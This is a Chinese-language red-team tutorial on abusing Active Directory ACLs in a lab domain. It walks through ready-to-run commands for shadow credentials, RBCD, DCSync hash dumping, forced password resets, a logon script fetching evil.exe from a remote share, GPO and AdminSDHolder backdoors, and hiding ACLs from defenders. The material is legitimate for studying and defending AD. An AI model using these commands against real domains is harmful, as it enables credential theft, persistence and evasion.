0x00 ACL概述
域架构可以看作所有ACL的整合,域中所有对象都有自己的ACL。当对象A访问B的时候,A出示自己的sid以及特权列表等信息,B通过查看自己的ACL判断A是否有权限访问。
ACL分为DACL和SACL,DACL和SACL又是由若干ACE构成。
DACL代表了每个用户之间的权限分配,比如alice对当前用户dandy有完全控制权限:
data:image/s3,"s3://crabby-images/e417f/e417f1d7f094b577ce1bb48936b9897ba8a57011" alt=""
SACL的作用是记录对象访问成功与否:
data:image/s3,"s3://crabby-images/68798/6879899ac20737c5a4c66dffdb6e1f409efa5c3e" alt=""
具体关于对安全描述符的解析可以参考:https://www.anquanke.com/post/id/197113
ACL滥用在常规域漏洞打完不生效、或者是拿下整个域后设置后门都是一种好的利用手法。当谈论基于 ACL 滥用时,一般都指自由访问控制列表 (DACL) 的访问控制条目 (ACE)。
0X01 常见的对象权限和类型
Generic_write=WriteProperty + ReadPermissions + All validated rights
GenericAll - 完全控制权限
WriteDACL - 具备修改对象 ACE的能力 -> GenericAll
WriteOwner - 更改对象write owner的能力 -> GenericAll
GenericWrite - 更新对象属性的能力
AllExtendedRights - 具备所有拓展权限(将计算机添加到域的用户会自动获得此权限)
Self-Membership - 将自己添加到组中的能力
data:image/s3,"s3://crabby-images/710dd/710ddab3e9a8bf9a22e13117c4dbaa6aab5adf83" alt=""
0x02 利用
WriteDacl
WriteDacl可以修改对象的 ACE,让指定用户对目标具有GenericAll权限。
添加
拿下域权限后添加smith对dandy的WriteDacl权限:
lex
data:image/s3,"s3://crabby-images/1fdeb/1fdeb0cc9ef4520d8e9eda249efc036ba668e169" alt=""
滥用
通过smith设置任意用户到dandy的GenericAll属性(以smith举例):
ldap_shell
data:image/s3,"s3://crabby-images/45502/455029c1e94ae07898193d2ccec9c9901b61efeb" alt=""
至此smith可滥用对dandy的所有属性。
WriteOwner
WriteOwner可以修改Owner为自己本身,Owner 又默认拥有WriteDacl 和 READ/CONTROL权限,可以设置让自身对目标具有GenericAll权限。
添加
拿下域权限后添加jenny对kane的WriteOwner权限:
lex
data:image/s3,"s3://crabby-images/ccd3c/ccd3c257db50154a4e58c75cbe2595d5b7a25471" alt=""
adfind查询:
AdFind.exe -b "CN=kane,CN=Users,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr jenny
data:image/s3,"s3://crabby-images/8def0/8def0b933f8964394daf07bc752a2cde085f802b" alt=""
滥用
ldap_shell
[1]将kane的owner改为自己(jenny)
set_owner kane jenny
[2]owner有read/control等权限,赋予jenny对kane的GenericAll权限
set_genericall kane jenny
data:image/s3,"s3://crabby-images/4955e/4955e3bbee0d9e70768a9188dd3a2d122da7bc33" alt=""
至此jenny可滥用对kane的所有属性。
shadow credentials
GenericAll,GenericWrite,WriteDACL,WriteOwner,WriteProperty(msDS-KeyCredentialLink) over the target.
ms-DS-Key-Credential-Link Guid:5B47D60F-6090-40B2-9F37-2A4DE88F3063
PKINIT 是 Kerberos 预认证的非对称密钥方法(对称方法依赖于客户端的密码),在滥用 Key Trust 时,实际上是在向目标帐户添加替代凭据,从而允许获取 TGT 并用于后续操作。即使用户/计算机更改了密码,这些影子凭据也会保留。
1.默认Domain admins、Key Admins、Enterprise Key Admins组有对域内所有msDS-KeyCredentialLink属性的写入权限 。
2.机器账户有对自身msDS-KeyCredentialLink 的写入权限。
3.对用户对象具有GenericAll/WriteOwner/WriteDACL权限的用户。
滥用前提:
至少一个 Windows Server 2016 域控制器。
安装在域控制器上的服务器身份验证数字证书。
Active Directory 中的 Windows Server 2016 功能级别。
添加
拿下域后,通过高权限账户设置alice对DC1$的msDS-KeyCredentialLink的WriteProperty权限:
1.ldap_shell
dacl_modify DC1$ alice add 5B47D60F-6090-40B2-9F37-2A4DE88F3063
data:image/s3,"s3://crabby-images/0dacb/0dacb67a3a217499ce53c61abd323d4ce27d10d6" alt=""
2.lex
data:image/s3,"s3://crabby-images/73534/73534a9897b0a00a0bcf6f7a9e810672277127e0" alt=""
adfind查询:
AdFind.exe -b "CN=DC1,OU=Domain Controllers,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr alice
data:image/s3,"s3://crabby-images/57024/57024bf476ed848f95456c5fa553cef3501d81ba" alt=""
滥用
certipy添加DC1$的msDS-KeyCredentialLink属性,并将证书转换为TGT(返回的PAC中同样包含了ntlm hash)
data:image/s3,"s3://crabby-images/45c02/45c0218a4bbb897cfb464ec71a8f567653efe2b9" alt=""
也可以直接auto dump出目标hash
certipy shadow auto -u alice@redteam.lab -p '1qaz@WSX' -account dc1
data:image/s3,"s3://crabby-images/0da87/0da870a6cd3e2ae8a488b3cb4516e3174435b1aa" alt=""
DC机器账户具有dcsync权限,利用证书中提权出来的ntlm hash进行dcsync
python3 secretsdump.py 'redteam.lab/DC1$'@192.168.132.130 -hashes :ae854cc8401465667695085104dcbfd2 -just-dc-user administrator
data:image/s3,"s3://crabby-images/1ce16/1ce16342e813c16b5ee107ef450f6a842e9d91a2" alt=""
RBCD
GenericAll,GenericWrite,WriteDacl,WriteOwner,WriteProperty(msDS-AllowedToActOnBehalfOfOtherIdentity/Account Restrictions) over the target user/computer.
Account Restrictions Guid:4c164200-20c0-11d0-a768-00aa006e0529
msDS-AllowedToActOnBehalfOfOtherIdentity Guid:3F78C3E5-F79A-46BD-A0B8-9D18116DDC79
如果对计算机对象/域用户具Account Restriction和msDS-AllowedToActOnBehalfOfOtherIdentity属性的WriteProperty,就能进行基于资源约束委派的利用。
基于资源的约束委派(Computer)
添加
分两种情况:
(1).creator-sid 用户:
alice-workstation由alice拉入域中,则alice默认就具有alice-workstation的Account Restriction的WriteProperty权限
data:image/s3,"s3://crabby-images/29f49/29f49298f264b7742270d6bcef7d1453b9a781c9" alt=""
(2).拿下域权限后添加bob对alice-workstation$的msDS-AllowedToActOnBehalfOfOtherIdentity的WriteProperty权限
1.ldap_shell
dacl_modify alice-workstation$ bob add 3F78C3E5-F79A-46BD-A0B8-9D18116DDC79
data:image/s3,"s3://crabby-images/b1cf7/b1cf7edcd195c04f47ac8eab99dacc42c77c5a34" alt=""
2.lex
data:image/s3,"s3://crabby-images/ca95f/ca95fb0b01b6819b23f4657151f323ba4a8966fb" alt=""
adfind对alice-workstation的acl进行查询:
AdFind.exe -b "CN=alice-workstation,CN=Computers,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++
data:image/s3,"s3://crabby-images/f54f9/f54f9d6bfa832525e1239e080a1ff5ae17523121" alt=""
滥用
以bob对alice-workstation$滥用进行演示:
域用户默认能添加10台计算机入域(maq),以bob的身份添加bob-evil$
python3 addcomputer.py -method SAMR -dc-ip 192.168.132.130 -computer-name bob-evil -computer-pass 1qaz@WSX "redteam.lab/bob:Qq123456.."
data:image/s3,"s3://crabby-images/203dd/203ddd22b481ddc603a1d956a92cc4be8ca88388" alt=""
设置bob-evil到alice-station$的rbcd
python3 rbcd.py redteam.lab/bob:Qq123456.. -action write -delegate-to 'alice-station$' -delegate-from 'bob-evil$' -dc-ip 192.168.132.130
data:image/s3,"s3://crabby-images/14a0c/14a0c63ef34166ca097be2a6f64db0a81dc0ce5b" alt=""
约束委派生成administrator对alice-station$的cifs ST票据
python3 getST.py -spn cifs/alice-station.redteam.lab 'redteam.lab/bob-evil$:1qaz@WSX' -impersonate administrator -dc-ip 192.168.132.130
data:image/s3,"s3://crabby-images/58170/581706faa21ee846cf5ff286c2703b9432cc93d8" alt=""
导入票据并获得一个wmi的交互式shell
export KRB5CCNAME=administrator.ccache
python3 wmiexec.py administrator@alice-station.redteam.lab -k -no-pass
data:image/s3,"s3://crabby-images/1cf5a/1cf5a350417621575520a1cbe1e580bcf6f4de7f" alt=""
基于资源的约束委派(User)
前段时间,老外已经研究出了这种利用方式:
data:image/s3,"s3://crabby-images/45951/459517fc402e22ca5929fc46615945aaf4f59e71" alt=""
在maq=0的情况下,攻击者无法创建机器账户,可以通过域用户rbcd到域机器账户进行滥用。
添加
跟上面一样,alice-station由alice拉入域中,所以alice具有alice-station$域用户的msDS-AllowedToActOnBehalfOfOtherIdentity的WriteProperty权限。
设置bob到alice-station$到bob的rbcd:
python3 rbcd.py redteam.lab/alice:Qq123456.. -action write -delegate-to 'alice-station$' -delegate-from 'bob' -dc-ip 192.168.132.130
data:image/s3,"s3://crabby-images/0bff8/0bff81390f010f2813958ad6da7d6dde07338f09" alt=""
滥用
getST.py生成administrator对alice-station的cifs ST票据:
python3 getST.py -spn cifs/alice-station.redteam.lab 'redteam.lab/bob:Qq123456..' -impersonate administrator -dc-ip 192.168.132.130
data:image/s3,"s3://crabby-images/923ec/923ece4defb550a13d7e154311dc50bec3170a62" alt=""
在S4U2self阶段报错:Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN。
这是因为用户默认没有注册SPN,KDC无法选择正确的密钥来解密,所以在S4U2Self才会失败。如果将 SPN 添加到bob就能成功从KDC申请ST票据,这意味着这不是用户帐户本身的问题,而只是 KDC 无法选择正确密钥进行解密。
U2U实现了用户到用户的身份验证拓展,在S4U2Proxy阶段KDC会尝试使用bob的Long-term key(bob 的hash)进行解密,但U2U会使用附加到TGS-REQ当中的TGT会话密钥加密之后的票据,KDC无法正常解密。这时可以利用SamrChangePasswordUser在S4U2Self和S4U2Proxy中间将bob的hash更改成U2U对TGT加密密钥的值,KDC就能成功解密并颁发ST票据。
具体可参考:https://mp.weixin.qq.com/s/1eJb-UtSVRV5JF0gfQgwWg
Rubeus.exe s4u /user:bob /domain:redteam.lab /dc:dc1.redteam.lab /rc4:5E95607216D9A4B7654D831BEB9EE95C /impersonateuser:Administrator /msdsspn:cifs/alice-station.redteam.lab
data:image/s3,"s3://crabby-images/40ac6/40ac6b2c3be4031f7d9db0243bc2b33d262fc315" alt=""
impacket利用
以设置普通域用户dandy基于资源约束委派到dc1$为例,这里直接粗暴利用administrator设置rbcd
# 设置dandy到dc1$的RBCD
python3 rbcd.py redteam.lab/administrator:Qq123456.. -action write -delegate-to 'dc1$' -delegate-from 'dandy' -dc-ip 192.168.134.130
# 使用dandy的hash生成TGT(ntlm hash使用RC4加密)
getTGT.py -hashes :$(pypykatz crypto nt 'Qq123456..') 'redteam.lab/dandy' -dc-ip 192.168.134.130
# 获取dandyTGT的Session Key
python3 describeticket.py dandy.ccache | grep 'Ticket Session Key'
# 将dandy的hash设置为Session Key
python3 smbpasswd.py -newhashes :c592bc40c1908aff4787f4f4db7f0a82 'redteam/dandy:Qq123456..'@dc1.redteam.lab
# 导入TGT
export KRB5CCNAME=dandy.ccache
# 利用u2u获取dc1的host service的ST
python3 getST.py -u2u -impersonate administrator -spn "host/dc1.redteam.lab" -k -no-pass 'redteam.lab/dandy'
# 导入ST
export KRB5CCNAME=administrator@host_dc1.redteam.lab@REDTEAM.LAB.ccache
# WMI
python3 wmiexec.py administrator@dc1.redteam.lab -k -no-pass
data:image/s3,"s3://crabby-images/11e4b/11e4b399d6fc8505d041ee011272f4061f0bb5f3" alt=""
注:SamrChangePasswordUser受域组策略影响,域内默认且普遍存在密码策略,可能不能做到及时改回密码。如果肯定通过当前域用户能拿下DC的话可以进行尝试,利用成功后将用户密码改为原来的值。
Self (Self-Membership) on Group
GenericAll,GenericWrite,WriteDacl,WriteOwner,WriteProperty(member) over the target group.
member Guid:BF9679C0-0DE6-11D0-A285-00AA003049E2
如果用户有对目标组有WriteProperty(member) 的权限时,可以滥用 Self (Self-Membership) on Group 权限,可将任意用户添加至受害组。
通常作用于domain admins 、exchange windows permission、exchange trusted subsystem、backup operators等组。
添加
拿下域权限后添加dandy对domain admins的member属性的WriteProperty权限:
1.ldap_shell
dacl_modify "domain admins" dandy add BF9679C0-0DE6-11D0-A285-00AA003049E2
data:image/s3,"s3://crabby-images/81203/81203a45bc5d1ab88d8d9b17f666ba8e7a2b219f" alt=""
2.lex
data:image/s3,"s3://crabby-images/78b5e/78b5e45a3615d50381e8d6a908fb4cbc4e48a3fe" alt=""
adfind查询:
AdFind.exe -b "CN=Domain Admins,CN=Users,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr dandy
data:image/s3,"s3://crabby-images/e4070/e4070f97812e79969592fb78b3265a10a8c76ba6" alt=""
滥用
add bob to domain admins
1.ldap_shell
data:image/s3,"s3://crabby-images/b9cee/b9ceee41208ab9f1d997a78407d7b15e75512089" alt=""
2.cmd
data:image/s3,"s3://crabby-images/7e1ee/7e1eee89fbfd12bf6aaa6e53480f816010f764e2" alt=""
logon script
GenericAll,GenericWrite,WriteDacl,WriteOwner,WriteProperty(scriptPath/Logon Information) over the target user.
ScriptPath Guid:BF9679C0-0DE6-11D0-A285-00AA003049E2
Logon information Guid:5F202010-79A5-11D0-9020-00C04FC2D4CF
如果用户有对目标WriteProperty(scriptPath或Logon Information)的权限时,可以滥用logon script权限,在受害者登录时执行自定义脚本。
添加
拿下域后设置dandy对bob具有WriteProperty的Logon Information权限:
1.ldap_shell
dacl_modify bob dandy add 5F202010-79A5-11D0-9020-00C04FC2D4CF
data:image/s3,"s3://crabby-images/3183f/3183f0dbfcb5f5d2a7d804724f3259e26a9a61ea" alt=""
2.lex
data:image/s3,"s3://crabby-images/8d1f6/8d1f631fa5e96812be4ef99b265dabf47c507a14" alt=""
adfind查询:
AdFind.exe -b "CN=bob,CN=Users,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr dandy
data:image/s3,"s3://crabby-images/aacca/aacca808f1bb8a67b2ade9733bc81eedbc6fe32f" alt=""
滥用
powershell
Set-DomainObject -Identity bob -Set @{'scriptpath'='\\192.168.132.100\evil.exe'} -Verbose
data:image/s3,"s3://crabby-images/9c4d3/9c4d38d543b58d44b6cbc975a11402b7c51cfd3c" alt=""
data:image/s3,"s3://crabby-images/d8870/d8870a813c171d4a4d72570848ca3a966d139175" alt=""
Targeted Kerberoasting
GenericAll,GenericWrite,WriteDacl,WriteOwner,WriteProperty(servicePrincipalName) over the target user.
servicePrincipalName Guid:F3A64788-5306-11D1-A9C5-0000F80367C1
通过将任意无意义的SPN ( ServicePrincipalName) 添加到该帐户。一旦帐户具有 SPN,就能对其进行Kerberoasting,如果目标密码较弱,则可能被攻击者成功离线爆破。
添加
拿下域权限后添加allen对alice的servicePrincipalName的WriteProperty权限(alice为普通域用户,没有注册SPN):
1.ldap_shell
dacl_modify alice allen add F3A64788-5306-11D1-A9C5-0000F80367C1
data:image/s3,"s3://crabby-images/7c6d4/7c6d4612d8b4476210592b30a452351fd8698661" alt=""
2.lex
data:image/s3,"s3://crabby-images/45b58/45b58d1cbd893595b494a795eebf7d91deed1bab" alt=""
adfind查询:
AdFind.exe -b "CN=alice,CN=Users,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr allen
data:image/s3,"s3://crabby-images/60af6/60af65392c7d7bbb5325fb7b4ba0ce70d8f9aa4f" alt=""
滥用
1.targetedKerberoast.py
python3 targetedKerberoast.py -d redteam.lab -u allen -p Qq123456.. --dc-ip 192.168.132.130 -vv
data:image/s3,"s3://crabby-images/a8e0b/a8e0b56bf74f395cdfb433d17d1bddedecd19094" alt=""
通过verbose输出可以看到,对于每个没有 SPN 的用户,targetedKerberoast会尝试设置一个SPN(滥用servicePrincipalName
属性的写入权限),打印hashcat格式的用户hash,然后删除设置的SPN。
2.powershell
# Make sur that the target account has no SPN
Get-DomainUser 'alice' | Select serviceprincipalname
# Set the SPN
Set-DomainObject -Identity 'alice' -Set @{serviceprincipalname='abc/qweasdzxc'}
# Obtain a kerberoast hash
$User = Get-DomainUser 'alice'
$User | Get-DomainSPNTicket | fl
# Clear the SPNs of the target account
Set-DomainObject -Identity alice -Clear serviceprincipalname
data:image/s3,"s3://crabby-images/7e79d/7e79d0f4252566e32df93dcbc9c272d48fa46092" alt=""
注:SPN 分机器账户和普通域用户;机器账户默认包含SPN属性,但其密码30天会自动更改,并且长度为随机的120字符,基本不存在爆破成功的可能,所以Kerberoasting利用工具都排除了机器账户的利用。
Force Change Password
GenericAll,WriteDacl,WriteOwner,AllExtendedRights(Reset Password) over the target user/computer.
Reset Password Guid:00299570-246d-11d0-a768-00aa006e0529
data:image/s3,"s3://crabby-images/bc81e/bc81e6dee0485fdb729b2f5216e4e4d394924515" alt=""
ChangeNTLM
如果拿到了一个域用户的hash但解不出来,能调用SamrChangePasswordUser
将该域用户重置新的明文密码或hash。利用需要对目标用户有Change Password权限,该权限一般是everyone拥有的,所以基本上拿到目标用户的hash/密码后都可以进行密码更改。
比如抓到alice的hash为5e95607216d9a4b7654d831beb9ee95c
python3 smbpasswd.py redteam/alice@redteam.lab -hashes :5e95607216d9a4b7654d831beb9ee95c -newpass '123QWE&*('
data:image/s3,"s3://crabby-images/8f5fe/8f5fee6b8b422360bc5484b7c5d945e6015d3a22" alt=""
ChangeNTLM利用受域内组策略影响,如果域内密码策略进行了限制,比如设置了密码最短使用期限为1天,这样每天只能修改一次密码。并且如果测试设置了强制密码历史规则时,则在更改次数内不能将密码修改为原密码。
SetNTLM
SetNTLM调用SamrSetInformationUser
,能在不知道域用户密码的情况下将其重置为新的密码或hash,利用需要对要修改的用户有Reset Password权限(域管默认拥有)。
比如拿下了整个域,但dandy的hash解不出来,就能直接通过域管重置dandy的密码:
python3 smbpasswd.py redteam/dandy@redteam.lab -newpass '123!@#QWE' -altuser redteam/administrator -altpass Qq123456.. -debug -admin
data:image/s3,"s3://crabby-images/870cd/870cdcfd502639320946485d1a3cb08cd30bb645" alt=""
当使用-admin 参数时,smbpasswd.py会自动调用SamrSetInformationUser
对目标密码进行修改。
data:image/s3,"s3://crabby-images/8e159/8e159c77a24144eb133b6ad56aa5d9e3043e154c" alt=""
两种修改密码的方式都有各自的优缺点,攻击者可以设置acl让任意账户对特定账户有Reset Password权限,从而达到不知道目标用户密码也能对其进行修改的目的。
添加
拿下域权限后设置allen到alice的AllExtendedRights中的Reset Password权限,可在不知道alice密码的情况下用allen修改他的密码。
lex
data:image/s3,"s3://crabby-images/85c67/85c671e0d55cd07f0b5261b3e9db43e30454b369" alt=""
adfind查询:
AdFind.exe -b "CN=alice,CN=users,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr allen
data:image/s3,"s3://crabby-images/a056d/a056d36c76967685ce130538200443c3911d8850" alt=""
滥用
1.impacket
python3 smbpasswd.py redteam/alice@redteam.lab -newpass '123qwe!@#' -altuser redteam/allen -altpass Qq123456.. -admin
data:image/s3,"s3://crabby-images/38db5/38db5071f4007bc8202033f730f2ca8a15cfeae3" alt=""
2.powershell
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'alice' -AccountPassword $NewPassword
data:image/s3,"s3://crabby-images/6dd3a/6dd3a02c181bc329e36760616cd774d7cce39a03" alt=""
Dcsync
GenericAll,WriteDacl,WriteOwner,AllExtendedRights(DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) over the basedn.
如果域对象具备以下两个权限,就能dcsync:
DS-Replication-Get-Changes = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
DS-Replication-Get-Changes-All = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
添加
拿下域后设置smith对DC=redteam,DC=lab的WriteDacl权限,然后smith就能设置任何用户的Dcsync属性:
1.ldap_shell:
dacl_modify DC=redteam,DC=lab smith add WriteDacl
data:image/s3,"s3://crabby-images/e2ff7/e2ff719708499b4fbb5624cb8fbec838462c5fd9" alt=""
2.lex:
data:image/s3,"s3://crabby-images/a8cf3/a8cf3ce23f9f45606006a7d8ac9f4cf9b63efc2c" alt=""
adfind查询:
AdFind.exe -b "DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr smith
data:image/s3,"s3://crabby-images/c3dae/c3daeb653599adb86588c4f26327ef1ab8594e75" alt=""
滥用
以设置tom用户的dcsync属性为例:
1.dcsync.py
python3 dcsync.py -dc dc1.redteam.lab -t 'CN=tom,CN=Users,DC=redteam,DC=lab' 'redteam\smith:Qq123456..'
data:image/s3,"s3://crabby-images/84c53/84c53458686860c6861285d453844deebe852ea5" alt=""
2.powershell
Add-DomainObjectAcl -TargetIdentity "DC=redteam,DC=lab" -PrincipalIdentity tom -Rights DCSync -Verbose
data:image/s3,"s3://crabby-images/935a6/935a69ea35cea8531993036b618439514e94e8b9" alt=""
adfind查询:
AdFind.exe -s subtree -b "DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr tom
data:image/s3,"s3://crabby-images/0b854/0b85444417319178b55c0dd584f2eadd6c923cd7" alt=""
dump hash
python3 secretsdump.py redteam.lab/tom:'Qq123456..'@192.168.132.130 -just-dc-user administrator
data:image/s3,"s3://crabby-images/c4285/c42858fbb41453bb61e370a7e450253464bab185" alt=""
清除:
python3 aclpwn.py -r aclpwn-20220926-150940.restore
data:image/s3,"s3://crabby-images/53a9c/53a9c95a1885852378428ad83fee3544733bd8c3" alt=""
evil GPO
GenericAll,GenericWrite,WriteDacl,WriteOwner,WriteProperty(gPCFileSysPath) over the policy.
在对域内某一GPO具有修改权限时,能对GPO内的对象添加用户权限、添加一个本地管理员、配置一个用户或计算机登录脚本、配置计算机或用户立即执行的任务等进行滥用。
每个OU都有一个唯一id,名为saler的OU的id为E9AFFCC6-5582-4F88-9483-D906A4E35FA8:
data:image/s3,"s3://crabby-images/0f131/0f131dd1cb95387c8900081c8983ddd073e5cd78" alt=""
GPO又分为GPT和GPC存储:
GPT包含了组策略的配置信息。
GPC里的gPCFileSysPath链接到GPT。在LDAP中的CN=Policies,CN=System,DC=domain,DC=name目录下,每个OU都对应一个GPC,并且GPC名称与OU的id一致。
data:image/s3,"s3://crabby-images/e37c5/e37c53b3b6cbb3164d5cd13d597547c32b728655" alt=""
对GPO进行滥用其实本质上就是修改
\domain.name\SysVol\domain.name\Policies{GPO_GUID}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf相关的GPO文件。
添加
有的域会存在委派用户对特定OU具有修改权限的情况,比如alice对saler policy存在编辑权限:
data:image/s3,"s3://crabby-images/e3c74/e3c7436b4f260293bd1ec77c56f7c5a7acf5a117" alt=""
1.LEX
data:image/s3,"s3://crabby-images/ad3b2/ad3b2a8d1c50dcabf7ec99b593d4c341bee213b0" alt=""
2.powershell
$RawObject = Get-DomainGPO -Raw -Identity '市场部-A组-北京-交付-组策略'
$TargetObject = $RawObject.GetDirectoryEntry()
$ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity evilss -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty
$TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACE)
$TargetObject.PsBase.CommitChanges()
data:image/s3,"s3://crabby-images/8310a/8310ae2f104ec9ca5e74aa0aeb2f181fdcb4f0d7" alt=""
至此evilss对市场部-A组-北京-交付组策略有GenericAll权限
data:image/s3,"s3://crabby-images/42c06/42c06330799d596e7e3cd18c075dc497492ca3f9" alt=""
bloodhound
data:image/s3,"s3://crabby-images/761a2/761a21d03ea4a28a4bc096a040a7cc9b4b3f7e8c" alt=""
SharpGPOAbuse
以将backdooruser添加到本地管理员组为例
data:image/s3,"s3://crabby-images/ae179/ae1798a5e429fec908b1115fcdeeb452671d449f" alt=""
GPO 每 90 分钟更新, 或者使用gpupdate /force
强制更新。
data:image/s3,"s3://crabby-images/ec10d/ec10d066f86549ae88fd31afaf7b5d24f396c01a" alt=""
AdminSDHolder
GenericAll,WriteDACL,WriteOwner over CN=AdminSDHolder,CN=System,DC=domain,DC=name.
AdminSDHolder位于AD中的system下,可以看成是域内很多个组例如Domain Admins、Domain Controllers、Enterprise Admins等组的集合,如果一个用户能完全控制AdminSDHolder,那么它就能同时控制这个集合里面的所有组。
data:image/s3,"s3://crabby-images/85395/853954a1b2aba4be2e322bb6f675d433f9db1833" alt=""
AdminSDHolder通过SDProp保护,防止受保护对象(admincount=1的用户和组,例如domain admins)被恶意或者无意修改。检查将以AdminSDHolder ACL为准,如果受保护对象的ACL与AdminSDHolder中的不一致,SDProp进程将重写该保护对象的ACL,使其恢复与AdminSDHolder容器相同的ACL配置。
添加
为dandy设置AdminSDHolder的GenericAll:
1.lex
data:image/s3,"s3://crabby-images/af6f3/af6f31db3f4965b834ce8a2300609f786e4c6534" alt=""
2.powershell
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName dandy -Verbose -Rights All
adfind查询:
AdFind.exe -b "CN=AdminSDHolder,CN=System,DC=redteam,DC=lab" -sdna nTSecurityDescriptor -sddl+++ | findstr dandy
data:image/s3,"s3://crabby-images/29c5c/29c5c90a13ee8ac2d66d4a9d65b14fd2a34e1b5c" alt=""
SDProp默认每60分钟运行一次,可以通过ldp.exe或者修改注册表的方式强制更新。
滥用
通过dandy添加smith到domain admins组:
1.ldap_shell:
data:image/s3,"s3://crabby-images/d9e39/d9e39f7fd741422d728208d1a1c8238ace73ff11" alt=""
2.cmd:
data:image/s3,"s3://crabby-images/5c563/5c5636f64664fae08475360b3ff773984893d34e" alt=""
LAPS
GenericAll,WriteDacl,WriteOwner,AllExtendedRights over the target computer.
LAPS(本地管理员密码解决方案)为域中每台域机器的公共本地管理员用户设置不同的随机密码,解决了臭名昭著的PTH,使用该解决方案的域管可以确定哪些用户有权读取LAPS的密码。
添加
如果A机器启动了LAPS,那么对A机器拥有AllExtendedRights权限的用户可以查看A的LAPS的密码:
lex
data:image/s3,"s3://crabby-images/48ce6/48ce62af12ab59f2bf200b23cecc952d763072d0" alt=""
滥用
adinfo
./Adinfo_darwin -d redteam.lab --dc 192.168.132.130 -u bob -p Qq123456.. --checkLAPS
data:image/s3,"s3://crabby-images/88bbd/88bbdd329f92595f8df3d82cd45078553dd54a87" alt=""
adexplorer查看
data:image/s3,"s3://crabby-images/92978/929787c18bb4759c1c00fe5d38e4219bf6454666" alt=""
WriteSPN
data:image/s3,"s3://crabby-images/6cab8/6cab8eefe1fbee7d28c008505b7d66029b2c9de1" alt=""
0x03 LEX、Adfind图示
GenericWrite
data:image/s3,"s3://crabby-images/0d280/0d280c7da73f0c0d181a575d50aea9cec90a9d28" alt=""
data:image/s3,"s3://crabby-images/197ba/197bae96619f4cdec58acfd0ef7c3876ce18bb6f" alt=""
GenericDACL
data:image/s3,"s3://crabby-images/4a6b9/4a6b95385110a27b1718df2023f40f89d2b85f27" alt=""
data:image/s3,"s3://crabby-images/dd4c8/dd4c81a695406ef8946dcb5a525fceae0e16ee24" alt=""
WriteProperty
data:image/s3,"s3://crabby-images/173bc/173bc9f9722cf5e0f9d1b9c16cef33a61628113f" alt=""
data:image/s3,"s3://crabby-images/39cc5/39cc563abb33a06e97af95b0c2b3ad9a0ba5fde9" alt=""
GenericAll
data:image/s3,"s3://crabby-images/65ea7/65ea75b71c8547076e16163a904e173519e19904" alt=""
data:image/s3,"s3://crabby-images/3a5c5/3a5c5d739e7d660818e0b5af4a1820e87841e835" alt=""
AllExtendedRights
data:image/s3,"s3://crabby-images/1fb29/1fb298fffba921c636c51f5a71842e93257330aa" alt=""
data:image/s3,"s3://crabby-images/16fa4/16fa4bcef8e7f050c4c0bf4e9c9da38772c2142e" alt=""
0x04 隐藏ACL
通过隐藏账户可以掩盖主体本身,阻止防御者轻易的发现谁实际上拥有ACE中指定的权限。这种方式主要应对的是对于高危的ACL进行扫描行为。隐藏用户
1、将要隐藏的用户所有者改为攻击者或者攻击者控制的账户
2、设置一条拒绝完全控制的ACE添加SELF用户和Everyone用户拒绝类型,将要修改的组/用户名的所有者改为攻击者控制的用户名
之后就会变成一片空白,powerview也查不到
Get-DomainObjectAcl -Identity user01 -domain DOMAIN.local -Resolve
data:image/s3,"s3://crabby-images/73863/73863dce0d8fa2a56e079fed436f4aaf32d222ee" alt=""
0x05 小结
文章演示了一些常见的ACL利用场景。ACL利用的方式多种多样,其中还有很多没提到的用法,比如依照DENY ACE的优先度大于ALLOW ACE的特性设置“不可见”的OU、配合relay实现添加shadow credentials/dcsync等。
0x06 参考
https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/
https://mp.weixin.qq.com/s/1eJb-UtSVRV5JF0gfQgwWg
https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html
https://www.anquanke.com/post/id/197113?display=mobile
https://www.thehacker.recipes/ad/movement/dacl
https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse
https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
History
- Created 2022-10-22 05:51
- Published 2022-10-11 05:51
- Updated 2024-11-10 14:34